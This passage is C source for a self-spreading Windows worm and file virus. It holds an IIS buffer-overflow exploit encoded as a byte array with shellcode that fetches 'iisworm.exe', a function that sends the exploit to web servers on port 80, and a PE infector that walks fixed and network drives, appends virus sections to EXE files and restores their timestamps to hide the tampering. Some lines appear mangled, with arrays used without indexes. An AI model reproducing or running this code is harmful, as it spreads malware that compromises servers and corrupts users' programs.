  0x45, 0x54, 0x20, 0x2F, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41,
  0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0xB0, 0x87, 0x67, 0x68, 0xB0, 0x87, 0x67,
  0x68, 0x90, 0x90, 0x90, 0x90, 0x58, 0x58, 0x90, 0x33, 0xC0, 0x50, 0x5B, 0x53, 0x59, 0x8B,
  0xDE, 0x66, 0xB8, 0x21, 0x02, 0x03, 0xD8, 0x32, 0xC0, 0xD7, 0x2C, 0x21, 0x88, 0x03, 0x4B,
  0x3C, 0xDE, 0x75, 0xF4, 0x43, 0x43, 0xBA, 0xD0, 0x10, 0x67, 0x68, 0x52, 0x51, 0x53, 0xFF,
  0x12, 0x8B, 0xF0, 0x8B, 0xF9, 0xFC, 0x59, 0xB1, 0x06, 0x90, 0x5A, 0x43, 0x32, 0xC0, 0xD7,
  0x50, 0x58, 0x84, 0xC0, 0x50, 0x58, 0x75, 0xF4, 0x43, 0x52, 0x51, 0x53, 0x56, 0xB2, 0x54,
  0xFF, 0x12, 0xAB, 0x59, 0x5A, 0xE2, 0xE6, 0x43, 0x32, 0xC0, 0xD7, 0x50, 0x58, 0x84, 0xC0,
  0x50, 0x58, 0x75, 0xF4, 0x43, 0x52, 0x53, 0xFF, 0x12, 0x8B, 0xF0, 0x5A, 0x33, 0xC9, 0x50,
  0x58, 0xB1, 0x05, 0x43, 0x32, 0xC0, 0xD7, 0x50, 0x58, 0x84, 0xC0, 0x50, 0x58, 0x75, 0xF4,
  0x43, 0x52, 0x51, 0x53, 0x56, 0xB2, 0x54, 0xFF, 0x12, 0xAB, 0x59, 0x5A, 0xE2, 0xE6, 0x33,
  0xC0, 0x50, 0x40, 0x50, 0x40, 0x50, 0xFF, 0x57, 0xF4, 0x89, 0x47, 0xCC, 0x33, 0xC0, 0x50,
  0x50, 0xB0, 0x02, 0x66, 0xAB, 0x58, 0xB4, 0x50, 0x66, 0xAB, 0x58, 0xAB, 0xAB, 0xAB, 0xB1,
  0x21, 0x90, 0x66, 0x83, 0xC3, 0x16, 0x8B, 0xF3, 0x43, 0x32, 0xC0, 0xD7, 0x3A, 0xC8, 0x75,
  0xF8, 0x32, 0xC0, 0x88, 0x03, 0x56, 0xFF, 0x57, 0xEC, 0x90, 0x66, 0x83, 0xEF, 0x10, 0x92,
  0x8B, 0x52, 0x0C, 0x8B, 0x12, 0x8B, 0x12, 0x92, 0x8B, 0xD7, 0x89, 0x42, 0x04, 0x52, 0x6A,
  0x10, 0x52, 0xFF, 0x77, 0xCC, 0xFF, 0x57, 0xF8, 0x5A, 0x66, 0x83, 0xEE, 0x08, 0x56, 0x43,
  0x8B, 0xF3, 0xFC, 0xAC, 0x84, 0xC0, 0x75, 0xFB, 0x41, 0x4E, 0xC7, 0x06, 0x8D, 0x8A, 0x8D,
  0x8A, 0x81, 0x36, 0x80, 0x80, 0x80, 0x80, 0x33, 0xC0, 0x50, 0x50, 0x6A, 0x48, 0x53, 0xFF,
  0x77, 0xCC, 0xFF, 0x57, 0xF0, 0x58, 0x5B, 0x8B, 0xD0, 0x66, 0xB8, 0xFF, 0x0F, 0x50, 0x52,
  0x50, 0x52, 0xFF, 0x57, 0xE8, 0x8B, 0xF0, 0x58, 0x90, 0x90, 0x90, 0x90, 0x50, 0x53, 0xFF,
  0x57, 0xD4, 0x8B, 0xE8, 0x33, 0xC0, 0x5A, 0x52, 0x50, 0x52, 0x56, 0xFF, 0x77, 0xCC, 0xFF,
  0x57, 0xEC, 0x80, 0xFC, 0xFF, 0x74, 0x0F, 0x50, 0x56, 0x55, 0xFF, 0x57, 0xD8, 0x80, 0xFC,
  0xFF, 0x74, 0x04, 0x85, 0xC0, 0x75, 0xDF, 0x55, 0xFF, 0x57, 0xDC, 0x33, 0xC0, 0x40, 0x50,
  0x53, 0xFF, 0x57, 0xE4, 0x90, 0x90, 0x90, 0x90, 0xFF, 0x6C, 0x66, 0x73, 0x6F, 0x66, 0x6D,
  0x54, 0x53, 0x21, 0x80, 0x8D, 0x84, 0x93, 0x86, 0x82, 0x95, 0x21, 0x80, 0x8D, 0x98, 0x93,
  0x8A, 0x95, 0x86, 0x21, 0x80, 0x8D, 0x84, 0x8D, 0x90, 0x94, 0x86, 0x21, 0x80, 0x8D, 0x90,
  0x91, 0x86, 0x8F, 0x21, 0x78, 0x8A, 0x8F, 0x66, 0x99, 0x86, 0x84, 0x21, 0x68, 0x8D, 0x90,
  0x83, 0x82, 0x8D, 0x62, 0x8D, 0x8D, 0x90, 0x84, 0x21, 0x78, 0x74, 0x70, 0x64, 0x6C, 0x54,
  0x53, 0x21, 0x93, 0x86, 0x84, 0x97, 0x21, 0x94, 0x86, 0x8F, 0x85, 0x21, 0x94, 0x90, 0x84,
  0x8C, 0x86, 0x95, 0x21, 0x84, 0x90, 0x8F, 0x8F, 0x86, 0x84, 0x95, 0x21, 0x88, 0x86, 0x95,
  0x89, 0x90, 0x94, 0x95, 0x83, 0x9A, 0x8F, 0x82, 0x8E, 0x86, 0x21, 0x90, 0x98, 0x8F, 0x4F,
  0x86, 0x99, 0x86, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
  0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
  0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
  0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
  0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21,
  0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x21, 0x2E,
  0x68, 0x74, 0x72, 0x20, 0x48, 0x54, 0x54, 0x50, 0x2F, 0x31, 0x2E, 0x30, 0x0D, 0x0A, 0x0D,
  0x0A };

void attack(char *host) {
SOCKET s;
struct hostent *he;
SOCKADDR_IN sout;
int i;
s = socket(AF_INET,SOCK_STREAM,0);
he = gethostbyname(host);
if (!he) return;
sout.sin_family = AF_INET;
sout.sin_addr.s_addr = *((unsigned long *)he->h_addr_list[0]);
sout.sin_port = htons(80);
i = connect(s,(LPSOCKADDR)&sout,sizeof(sout));
if (i!=0) return;
send(s,sploit,sizeof(sploit),0);
closesocket(s);
}
void setuphostname() {
char s[1024];
struct hostent *he;
int i;

gethostname(s,1024);
he = gethostbyname(s);
strcpy(s,he->h_name);
strcat(s,\"!GET /iisworm.exe\");
for (i=0; i<strlen(s); i++) s+=0x21;
memcpy(sploit+sizeof(sploit)-102,he->h_name,strlen(he->h_name));
}
#define MEMALLOC(x) GlobalAlloc(GPTR, x)
#define MEMFREE(x) GlobalFree(x)

/////////////////////
// Type definitions
/////////////////////

typedef struct
{
WORD RelocOfs : 12;
WORD RelocType: 4;
} IMAGE_RELOCATION_DATA;

////////////
// Globals
////////////
IMAGE_NT_HEADERS PEHeader;
IMAGE_DOS_HEADER * IDosHeader;
IMAGE_NT_HEADERS * IPEHeader;
IMAGE_SECTION_HEADER * ISection;
IMAGE_SECTION_HEADER * Section = NULL;
int Generation = 1;
int VirusSections = 0;
int FirstVirusSection = 0;
int VirusCodeSection = 0;
int VirusImportSection = 0;
DWORD VirusImportSize = 0;
DWORD VirusRVAImports = 0;
DWORD HostRVAImports = 0;
int VirusRelocSection = 0;
DWORD VirusRelocSize = 0;
DWORD VirusRelocSizeDir = 0;
DWORD OfsSections = 0;
DWORD VirusBaseRVA = 0;
DWORD VirusEP = 0;
DWORD HostEP = 0;

//// Fix for Visual C 5.0 heap
//extern __small_block_heap;

//////////////
// Functions
//////////////

/////////////////////////////////////
// GetProcAddress for ordinal imports
/////////////////////////////////////
DWORD GetProcAddressOrd(DWORD Base, DWORD NFunc)
{
IMAGE_NT_HEADERS * DLLHeader;
IMAGE_EXPORT_DIRECTORY * Exports;
DWORD * AddrFunctions;

DLLHeader = (IMAGE_NT_HEADERS *)(Base + ((IMAGE_DOS_HEADER *)Base)->e_lfanew);
Exports = (IMAGE_EXPORT_DIRECTORY *)(Base + DLLHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
AddrFunctions = (DWORD *)(Base + Exports->AddressOfFunctions);
return Base + AddrFunctions[NFunc - Exports->Base];
}

//////////////////////////////////
// Check file and read PE header
//////////////////////////////////
int ReadPEHeader(HANDLE FHandle)//FILE * FHandle)
{
IMAGE_DOS_HEADER FileHeader;
WORD SizeSections;
DWORD BytesRead;

return
   ( // Read file header
   ( ReadFile(FHandle, &FileHeader, sizeof(IMAGE_DOS_HEADER), &BytesRead, NULL) )
   &&
   ( BytesRead == sizeof(IMAGE_DOS_HEADER) )
   && // Check if EXE file
   ( FileHeader.e_magic == IMAGE_DOS_SIGNATURE )
   && // Seek to NewExe header
   ( SetFilePointer(FHandle, FileHeader.e_lfanew, NULL, FILE_BEGIN) != (DWORD)-1 )
   && // Read header
   ( ReadFile(FHandle, &PEHeader, sizeof(IMAGE_NT_HEADERS), &BytesRead, NULL) )
   &&
   ( BytesRead == sizeof(IMAGE_NT_HEADERS) )
   && // Check if PE file
   ( PEHeader.Signature == IMAGE_NT_SIGNATURE )
   && // Alloc memory for file sections + virus sections
   ( (SizeSections = (PEHeader.FileHeader.NumberOfSections + VirusSections) * sizeof(IMAGE_SECTION_HEADER)) )
   &&
   ( (Section = MEMALLOC(SizeSections)) != NULL )
   &&
   ( (OfsSections = SetFilePointer(FHandle, 0, NULL, FILE_CURRENT)) )
   && // Read PE sections
   ( ReadFile(FHandle, Section, SizeSections, &BytesRead, NULL) )
   &&
   ( BytesRead == SizeSections )
   && // Check if there is enough room for our sections
   ( (SetFilePointer(FHandle, 0, NULL, FILE_CURRENT) + (VirusSections * sizeof(IMAGE_SECTION_HEADER))) <= PEHeader.OptionalHeader.SizeOfHeaders )
   && // Only infect when entry point belongs to 1st section
   // Avoid reinfections and compressors (usually perform virus checks)
   ( PEHeader.OptionalHeader.AddressOfEntryPoint < Section[0].VirtualAddress + Section[0].SizeOfRawData )
   && // Skip DDLs
   ( !(PEHeader.FileHeader.Characteristics & IMAGE_FILE_DLL) )
   && // Skip files with overlays or not aligned to file alignment
   ( SetFilePointer(FHandle, 0, NULL, FILE_END) == Section[PEHeader.FileHeader.NumberOfSections-1].PointerToRawData + Section[PEHeader.FileHeader.NumberOfSections-1].SizeOfRawData )
   && //Check if the host will overwrite our code with its unitialized data (not present in disk)
   ( Section[PEHeader.FileHeader.NumberOfSections-1].Misc.VirtualSize <= Section[PEHeader.FileHeader.NumberOfSections-1].SizeOfRawData )
   );
}

///////////////////////////////////////
// Translates a RVA into a file offset
///////////////////////////////////////
DWORD RVA2Ofs(DWORD rva)
{
int NSect;

NSect = 0;
while ( NSect < (PEHeader.FileHeader.NumberOfSections - 1) )
{
  if ( (Section[NSect].VirtualAddress + Section[NSect].SizeOfRawData) >= rva )
   break;
  NSect++;
}
return (Section[NSect].PointerToRawData + ( rva - Section[NSect].VirtualAddress ));
}

////////////////////////////////////////////
// I can\'t remember what this function does
////////////////////////////////////////////
void InfectFile(HANDLE FHandle)
{
BYTE * Relocations = NULL;
BYTE * HostRelocs = NULL;
BYTE * Ptr;
IMAGE_BASE_RELOCATION * RelocBlock;
IMAGE_RELOCATION_DATA * PtrReloc;
int j;

// Let\'s do some initializations
Section = NULL;
Relocations = NULL;
HostRelocs = NULL;
Ptr = NULL;

if (ReadPEHeader(FHandle))
{
  DWORD SectionRVA;
  int HostNSections;
  DWORD HostRelocsSize;
  DWORD BytesRead;
  int i;

  HostEP = PEHeader.OptionalHeader.AddressOfEntryPoint;
  HostNSections = PEHeader.FileHeader.NumberOfSections;

  HostRVAImports = PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;

  // Search for victim import section
  for (i=0; i<HostNSections; i++)
  {
   if (Section.VirtualAddress + Section.SizeOfRawData > HostRVAImports)
   {
   // Do it writable
   Section.Characteristics |= IMAGE_SCN_MEM_WRITE;
   break;
   }
  }

  // Check if last section is .reloc
  HostRelocsSize = 0;
  if (PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress == Section[HostNSections-1].VirtualAddress)
  {
   // Then we\'ll join it to virus reloc section
   VirusBaseRVA = SectionRVA = Section[HostNSections-1].VirtualAddress;
   if ( (HostRelocs = (BYTE *)MEMALLOC((HostRelocsSize = PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size))) == NULL)
   {
   goto L_Exit_Infect;
   }
   else // Read the .reloc section
   {
   HostNSections--;
   SetFilePointer(FHandle, Section[HostNSections].PointerToRawData, NULL, FILE_BEGIN);
   ReadFile(FHandle, HostRelocs, HostRelocsSize, &BytesRead, NULL);
   SetFilePointer(FHandle, Section[HostNSections].PointerToRawData, NULL, FILE_BEGIN);
   }
  }
  else // There is no .reloc or it is not the last section
  {
   if (PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
   { // There are relocs but we didn\'t find them, so exit
   goto L_Exit_Infect;
   }
   VirusBaseRVA = SectionRVA = PEHeader.OptionalHeader.SizeOfImage;
   SetFilePointer(FHandle, 0, NULL, FILE_END);
  }

  FirstVirusSection = HostNSections;
  // Add virus section table
  CopyMemory(&Section[HostNSections], &ISection[0], sizeof(IMAGE_SECTION_HEADER) * VirusSections);

  // Reloc virus code & fix reloc sections
  if ((Relocations = MEMALLOC((VirusRelocSize > 0x1000)? VirusRelocSize : 0x1000)) == NULL) // Minimun a page
  {
   goto L_Exit_Infect;
  }
  CopyMemory(Relocations, (BYTE *)((DWORD)IDosHeader + ISection[VirusRelocSection].VirtualAddress + ISection[VirusRelocSection].Misc.VirtualSize - VirusRelocSize), VirusRelocSize);

  RelocBlock = (IMAGE_BASE_RELOCATION *)Relocations;
  PtrReloc = (IMAGE_RELOCATION_DATA *)(Relocations + sizeof(IMAGE_BASE_RELOCATION));

  // Reloc all virus sections and write them to disk
  for (i=0; i<VirusSections; i++)
  {
   DWORD RelocsInBlock;

   Section[HostNSections + i].PointerToRawData = SetFilePointer(FHandle, 0, NULL, FILE_CURRENT);
   Section[HostNSections + i].VirtualAddress = SectionRVA;
   Section[HostNSections + i].SizeOfRawData = (ISection.SizeOfRawData + PEHeader.OptionalHeader.FileAlignment-1) & (-(long)PEHeader.OptionalHeader.FileAlignment);

   if (i == VirusRelocSection) // Virus reloc section?
   {
   PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress = SectionRVA;
   PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size = HostRelocsSize + VirusRelocSize;
   Section[HostNSections + i].Misc.VirtualSize = HostRelocsSize + VirusRelocSize;
   Section[HostNSections + i].SizeOfRawData = (HostRelocsSize + VirusRelocSize + (PEHeader.OptionalHeader.FileAlignment - 1)) & (-(long)PEHeader.OptionalHeader.FileAlignment);
   // Write host relocations
   WriteFile(FHandle, HostRelocs, HostRelocsSize, &BytesRead, NULL);
   // Add virus relocations
   WriteFile(FHandle, Relocations, VirusRelocSize, &BytesRead, NULL);
   // Fill with zeros until file alignment
   memset(Relocations, 0, 0x1000);
   WriteFile(FHandle, Relocations, Section[HostNSections + i].SizeOfRawData - (HostRelocsSize + VirusRelocSize), &BytesRead, NULL);
   }
   else
   {
   if ((Ptr = (BYTE *)MEMALLOC(ISection.SizeOfRawData)) == NULL)
   {
   goto L_Exit_Infect;
   }
   CopyMemory(Ptr, (BYTE *)((DWORD)IDosHeader + ISection.VirtualAddress), ISection.SizeOfRawData);

   // Patch Visual C 5.0 heap in .data section
/*
   {
   DWORD * PtrHeap = &__small_block_heap;

   if (((DWORD)IDosHeader + ISection.VirtualAddress < (DWORD)PtrHeap)
   &&
   ((DWORD)IDosHeader + ISection.VirtualAddress + ISection.SizeOfRawData > (DWORD)PtrHeap)
   )
   {
   PtrHeap = (DWORD *)(Ptr + (DWORD)PtrHeap - (DWORD)IDosHeader - ISection.VirtualAddress);
   PtrHeap[3] = PtrHeap[2];
   PtrHeap[4] = PtrHeap[5] = (DWORD)-1;
   }
   }
*/
   // Do relocations in this section
   while ( (ISection.VirtualAddress + ISection.SizeOfRawData > RelocBlock->VirtualAddress)
   &&
   ((DWORD)PtrReloc < (DWORD)Relocations + VirusRelocSizeDir)
   )
   {
   DWORD Base;

   Base = RelocBlock->VirtualAddress - ISection.VirtualAddress;
   RelocsInBlock = (RelocBlock->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(IMAGE_RELOCATION_DATA);
   while (RelocsInBlock--)
   {
   if (PtrReloc->RelocType == IMAGE_REL_BASED_HIGHLOW)
   {
   *((DWORD *)&Ptr[Base + PtrReloc->RelocOfs]) -= (IPEHeader->OptionalHeader.ImageBase + ISection.VirtualAddress);//RelocBlock->VirtualAddress);
   *((DWORD *)&Ptr[Base + PtrReloc->RelocOfs]) += (PEHeader.OptionalHeader.ImageBase + SectionRVA);
   }
   PtrReloc++;
   }
   RelocBlock->VirtualAddress = RelocBlock->VirtualAddress - ISection.VirtualAddress + SectionRVA;
   RelocBlock = (IMAGE_BASE_RELOCATION *)PtrReloc;
   PtrReloc = (IMAGE_RELOCATION_DATA *)((BYTE *)RelocBlock + sizeof(IMAGE_BASE_RELOCATION));
   }

   // Check if this is the Import section
   if (i == VirusImportSection)
   {
   IMAGE_IMPORT_DESCRIPTOR * Imports;
   IMAGE_THUNK_DATA * DataImports;
   DWORD StartImports;
   DWORD DeltaRVAs;

   DeltaRVAs = SectionRVA - ISection.VirtualAddress;
   StartImports = IPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress - ISection.VirtualAddress;
   Imports = (IMAGE_IMPORT_DESCRIPTOR *)&Ptr[StartImports];
   while (Imports->OriginalFirstThunk)
   {
   // Fix some initialized fields in memory
   Imports->TimeDateStamp = Imports->ForwarderChain = 0;
   Imports->OriginalFirstThunk += DeltaRVAs;
   Imports->Name += DeltaRVAs;
   Imports->FirstThunk += DeltaRVAs;
   DataImports = (IMAGE_THUNK_DATA *)&Ptr[Imports->OriginalFirstThunk - SectionRVA];
   do
   {
   DataImports->u1.AddressOfData = (IMAGE_IMPORT_BY_NAME *)((DWORD)DataImports->u1.AddressOfData + DeltaRVAs);
   }
   while ((++DataImports)->u1.AddressOfData);
   Imports++;
   }
   }

   WriteFile(FHandle, Ptr, Section[HostNSections + i].SizeOfRawData, &BytesRead, NULL);
   MEMFREE(Ptr);
   Ptr = NULL;
   }
   SectionRVA += ( Section[HostNSections + i].Misc.VirtualSize + (PEHeader.OptionalHeader.SectionAlignment - 1)) & (-(long)PEHeader.OptionalHeader.SectionAlignment);
  }//for

  // Recalculate Header fields
  PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].VirtualAddress = 0;
  PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT].Size = 0;
  PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].VirtualAddress = 0;
  PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IAT].Size = 0;
  PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress = VirusRVAImports + Section[HostNSections + VirusCodeSection].VirtualAddress;
  PEHeader.OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size = IPEHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].Size;
  PEHeader.OptionalHeader.SizeOfImage = SectionRVA;
  PEHeader.OptionalHeader.AddressOfEntryPoint = VirusEP + Section[HostNSections + VirusCodeSection].VirtualAddress;
  PEHeader.FileHeader.NumberOfSections = HostNSections + VirusSections;
  PEHeader.OptionalHeader.SizeOfCode = 0;
  PEHeader.OptionalHeader.SizeOfInitializedData = 0;
  PEHeader.OptionalHeader.SizeOfUninitializedData = 0;
  for (j=0; j<PEHeader.FileHeader.NumberOfSections; j++)
  {
   if (Section[j].Characteristics & IMAGE_SCN_CNT_CODE)
   PEHeader.OptionalHeader.SizeOfCode += Section[j].SizeOfRawData;
   if (Section[j].Characteristics & IMAGE_SCN_CNT_INITIALIZED_DATA)
   PEHeader.OptionalHeader.SizeOfInitializedData += Section[j].SizeOfRawData;
   if (Section[j].Characteristics & IMAGE_SCN_CNT_UNINITIALIZED_DATA)
   PEHeader.OptionalHeader.SizeOfUninitializedData += Section[j].SizeOfRawData;
  }
  // Write new header and section table
  SetFilePointer(FHandle, OfsSections - sizeof(IMAGE_NT_HEADERS), NULL, FILE_BEGIN);
  WriteFile(FHandle, &PEHeader, sizeof(IMAGE_NT_HEADERS), &BytesRead, NULL);
  WriteFile(FHandle, Section, PEHeader.FileHeader.NumberOfSections * sizeof(IMAGE_SECTION_HEADER), &BytesRead, NULL);
}

L_Exit_Infect:
// Free allocated memory
if (HostRelocs != NULL)
  MEMFREE(HostRelocs);
if (Relocations != NULL)
  MEMFREE(Relocations);
if (Section != NULL)
  MEMFREE(Section);
if (Ptr != NULL)
  MEMFREE(Ptr);
}

///////////////////////////////////////////
// Recursively search for files to infect
///////////////////////////////////////////
void SearchFiles(char * Path)
{
HANDLE FindHandle;
HANDLE FHandle;
WIN32_FIND_DATA FindResult;
FILETIME Time1, Time2, Time3;

if (SetCurrentDirectory(Path))
{
  // Search for EXE files in current directory
  if ((FindHandle = FindFirstFile(\"*.EXE\", &FindResult)) != INVALID_HANDLE_VALUE)
  {
   do
   {
   FHandle = CreateFile(FindResult.cFileName,
   GENERIC_READ | GENERIC_WRITE,
   0,
   NULL,
   OPEN_EXISTING,
   FILE_ATTRIBUTE_ARCHIVE,
   NULL
   );
   if (FHandle != INVALID_HANDLE_VALUE)
   {
   GetFileTime(FHandle, &Time1, &Time2, &Time3); // Get file time
   InfectFile(FHandle); // Infect file
   SetFileTime(FHandle, &Time1, &Time2, &Time3); // Restore file time
   CloseHandle(FHandle);
   }
   }
   while (FindNextFile(FindHandle, &FindResult));
  }
  FindClose(FindHandle);
  // Now search for subdirectories and process them
  if ((FindHandle = FindFirstFile(\"*\", &FindResult)) != INVALID_HANDLE_VALUE)
  {
   do
   {
   if (FindResult.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
   {
   char * DirName;

   DirName = _strupr(_strdup(FindResult.cFileName));
   if (
   (memcmp(DirName, \"SYSTEM\", 6)) // Skip SYSTEM??
   &&
   (FindResult.cFileName[0] != \'.\') // Skip loops with \".\" and \"..\"
   )
   {
   SearchFiles(FindResult.cFileName);
   }
   free(DirName);
   }
   }
   while (FindNextFile(FindHandle, &FindResult));
  }
  FindClose(FindHandle);
}
}

/////////////////////////////////////////////
// Search fixed and network drives to infect
/////////////////////////////////////////////
DWORD WINAPI SearchDrives()
{
DWORD Drives;
BYTE CurrentDrive[] = \"A:\\\\\";
DWORD DriveType;
BYTE i;

Drives = GetLogicalDrives();
for (i=0; i<sizeof(DWORD); i++)
{
  if (Drives & (1<<i)) // Drive present?
  {
   CurrentDrive[0] = \'A\' + i;
   DriveType = GetDriveType(CurrentDrive);
   // Only infect files in Fixed and Network Drives
   if ((DriveType == DRIVE_FIXED) || (DriveType == DRIVE_REMOTE))
   {
   SearchFiles(CurrentDrive);
   }
  }
}
return 1;
}

///////////
// Payload
///////////
